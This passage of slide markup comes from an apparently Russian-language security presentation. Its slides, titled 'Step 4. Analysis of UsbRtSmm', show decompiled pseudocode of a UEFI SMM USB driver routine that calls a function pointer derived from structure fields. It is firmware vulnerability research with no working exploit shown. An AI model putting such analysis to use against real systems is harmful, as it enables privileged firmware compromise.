            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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550" name="Shape 550"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="551" name="Shape 551"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650350" y="1558125"/>
            <a:ext cx="11278500" cy="4413300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="6FA8DC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>external int64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> ptr;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> // memory address 0xBD48B460</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>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F9F9F9"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>// memory address 0xBD4760AC</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6FA8DC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> __fastcall subfunc_14(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="6FA8DC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>int64</a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> a1)</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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>int64 v2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="45720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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>LODWORD(v2) = sub_BD475F9C(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>*(200 * ((*(a1 + 11) - 16) &gt;&gt; 4) + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> + 112 + 8i64 * *(a1 + 1) + 8),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>*(a1 + 3),</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>(*(a1 + 15) + 3) &amp; 0xFFFFFFFC);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="45720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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>*(a1 + 2) = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="45720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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>*(a1 + 19) = v2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="F9F9F9"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="45720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6FA8DC"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr i="0" lang="ru-RU" sz="1500" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="F9F9F9"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> v2;</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Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="552" name="Shape 552"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Step 4. Analysis of UsbRtSmm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="553" name="Shape 553"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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558" name="Shape 558"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="559" name="Shape 559"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660100" y="1583600"/>
            <a:ext cx="11130000" cy="5283300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45000" lIns="90000" rIns="90000" wrap="square" tIns="45000">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>int __fastcall sub_BD475F9C(int (__fastcall *a1)(_QWORD, _QWORD, _QWORD), _QWORD *a2, unsigned int a3)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="E63451"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>v3 = a3 &gt;&gt; 3;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="E63451"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>if ( v3 ) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>v4 = v3 - 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>if ( v4 ) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>v5 = v4 - 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>if ( v5 ) { … } </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>result = (a1)(*a2, a2[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>result = (a1)(*a2);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>result = (a1)();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="F3F3F3"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="F9F9F9"/>
              </a:buClr>
              <a:buFont typeface="Roboto Condensed"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>return result;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="560" name="Shape 560"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839880" y="457920"/>
            <a:ext cx="8837640" cy="82224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76B72A"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Roboto Condensed Light"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="ru-RU" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="76B72A"/>
                </a:solidFill>
                <a:latin typeface="Roboto Condensed Light"/>
                <a:ea typeface="Roboto Condensed Light"/>
                <a:cs typeface="Roboto Condensed Light"/>
                <a:sym typeface="Roboto Condensed Light"/>
              </a:rPr>
              <a:t>Step 4. Analysis of UsbRtSmm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="561" name="Shape 561"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731880" y="368280"/>
            <a:ext cx="44640" cy="886680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="77B82A"/>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566" name="Shape 566"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="567" name="Shape 567"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
